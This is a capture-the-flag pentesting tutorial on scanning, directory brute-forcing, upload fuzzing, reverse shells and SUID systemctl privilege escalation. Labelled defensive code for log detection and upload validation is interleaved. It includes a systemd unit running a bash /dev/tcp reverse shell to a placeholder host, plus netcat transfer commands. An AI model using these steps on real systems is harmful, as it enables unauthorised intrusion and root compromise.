Generally not required with box pwning, as the information is already in front of our eyes. See What is Reconnaissance/Footprinting for more information.
Port Scanning with nmap
One of the first steps of a pentest is "reconnaissance", or finding information regarding the target. To gather information about the target machine, one can use nmap, a free, open-source and powerful tool used to discover hosts and services on a computer network.
A first step toward that would be to use the following command:
nmap -sV <target_ip>
Often Used Flags
| nmap flag | Description |
|-----------|-------------|
| -sV | Attempts to determine the version of the services running |
| -p <x> or -p- | Port scan for port <x>, or scan all ports |
| -Pn | Disable host discovery and just scan for open ports |
| -A | Enables OS and version detection, and runs built-in scripts for further enumeration |
| -sC | Scan with the default nmap scripts |
| -v | Verbose mode |
| -sU | UDP port scan |
| -sS | TCP SYN port scan |
OWASP DirBuster is often used to brute-force a list of commonly used directory names. We will, however, use GoBuster, a similar but modern and fast tool written in Go.
It is available on Kali Linux 2020.1+ via sudo apt-get install gobuster, or on GitHub.
gobuster dir -u http://<ip>:<port> -w <word_list_location>
Note: On Kali Linux, word lists are under /usr/share/wordlists. For a quick brute force, directory-list-2.3-small.txt is a good start.
Often Used Flags
| GoBuster flag | Description |
|---------------|-------------|
| -e | Print the full URLs in your console |
| -u | The target URL |
| -w | Path to your word list |
| -U and -P | Username and Password for Basic Auth |
| -p | |
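GoBuster requests every word in the list, and the server answers most of them with 404, which is exactly what a defender can key on. The following is an added example (not from the original page and not GoBuster's own code) that runs a sliding-window 404 count over constructed combined-format log lines; the addresses, timestamps, user agent string and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined log format (Apache/nginx); the constructed sample lines below use it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample: 25 consecutive 404s from one address within 25 seconds,
# the footprint of a wordlist scan, plus a little normal traffic from another host.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:{i:02d} +0000] "GET /dir{i} HTTP/1.1" '
    f'404 196 "-" "gobuster/3.1.0"'
    for i in range(25)
] + [
    '198.51.100.4 - - [10/Oct/2023:13:55:10 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:13:55:12 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "path": m.group("path"),
            "status": int(m.group("status")), "ua": m.group("ua")}


def find_dir_bruteforce(lines, window_s=60, threshold=20):
    """Return {ip: max_404s_in_window} for every client that produced at least
    `threshold` 404 responses inside any `window_s`-second sliding window."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Shrink the window from the left until it spans at most window_s seconds.
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged
```

The User-Agent header is trivially changed by the scanner, so the rate of 404s per client, not the "gobuster" string, is the signal to alert on.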
Fuzz a Page
We can use Burp Suite’s “Intruder” to fuzz a website.
What we want to achieve here is to test which file extensions the website allows.
First we need to create a list (or use one from the Enterprise edition).
We intercept the POST request used to upload a file and send it to the Intruder tool. Using the "Sniper" attack type, we set the payload position on the file extension in the request.
On the “Payloads” tab, we add our list. On the “Options” tab we can use the “Grep - Match” feature to flag result items with responses matching an expression (for example “Extension not allowed”). This is helpful to quickly find which extension doesn’t return an error.
Time to start the attack!
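The defender's counterpart to this fuzzing run is an upload check that cannot be talked into accepting an unexpected extension. The following is an added example, not code from the original page, of a strict allowlist validator; the allowed extensions and the filename alphabet are assumptions for a hypothetical image-upload endpoint.

```python
import os
import re

# Constructed allowlist for a hypothetical image-upload endpoint (assumption,
# not from the original page): only these extensions are ever accepted.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# One base name, one dot, one extension, nothing else.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def is_upload_allowed(filename: str) -> bool:
    """Return True only if the filename passes the strict allowlist check.

    Deliberately stricter than "ends with .png":
    - path components are stripped, so "../../shell.php" is judged on its base name
    - NUL bytes and control characters are rejected outright (the "shell.php\\x00.png" trick)
    - the whole name must be base name + one extension, so "shell.php.png" and
      "shell.png.php" are both rejected
    - the comparison is case-insensitive, so "shell.PhP" is not a bypass
    """
    if not filename or any(ord(c) < 32 for c in filename):
        return False
    base = os.path.basename(filename.replace("\\", "/"))
    m = _SAFE_NAME.match(base)
    if not m:
        return False
    return m.group(1).lower() in ALLOWED_EXTENSIONS


def classify(filenames):
    """Map each candidate name to its verdict, much like a Grep - Match pass
    in Intruder labels responses: True means accepted, False means rejected."""
    return {name: is_upload_allowed(name) for name in filenames}
```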
Upload a Reverse Shell
Update your IP address and the port to use in the file and upload the file to the website (change file extension if necessary).
Next, use netcat to listen for incoming connections:
nc -lvnp <port_num>
Privilege escalation, also called privesc, is the act of gaining root access on a machine by one means or another.
Abusing a SUID file is a great way to gain privesc. To find SUID files, type:
find / -perm -u=s -type f 2>/dev/null
This shows every SUID file (typically owned by the root user) on the root file system and below.
stderr (standard error) is redirected to /dev/null to prevent errors from polluting the results.
Let's say we found the binary systemctl with the SUID bit set.
systemctl is used to start, stop and generally manage services. For this reason it's best to let only privileged users use it.
Create the Payload
We can craft a systemd unit file which executes a payload as the root user:
[Unit]
Description=Open a shell with root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<client_ip>/<port_1> 0>&1'
[Install]
WantedBy=multi-user.target
User is important to let systemd know we want to execute as root. Here, ExecStart is a simple one-line bash reverse shell.
<port_1> is the port we will use to connect later.
Upload the Payload
Next, we need to upload that payload to the target (or write it there as a one-liner). Once again we can use netcat for this task. On the target machine (i.e. through our reverse shell):
nc -vl <port_2> > /tmp/rootshell.service
We use /tmp as it should be writable even by a non-root user.
From our client machine, we send the file:
nc -n <target_ip> <port_2> < rootshell.service
Connect to the Host and Gain Privesc
This is getting confusing, but we need another netcat session to listen for the root shell:
nc -lvnp <port_1>
On the target machine (through the first reverse shell), execute the payload using:
systemctl enable /tmp/rootshell.service
systemctl start rootshell.service
If you get an error like the following, although you do have an [Install] section:
The unit files have no [Install] section. They are not meant to be enabled using systemctl.
it's because older versions of systemctl only load services from a set of pre-defined paths. Use
systemctl link /tmp/rootshell.service
first to allow loading (in later versions this is done automatically with
Depending on the system there may be post-exploitation stages. This stage generally involves:
- Pivoting: what other hosts can be targeted
- What additional information can we gather from the host now that we are a privileged user
- Covering your tracks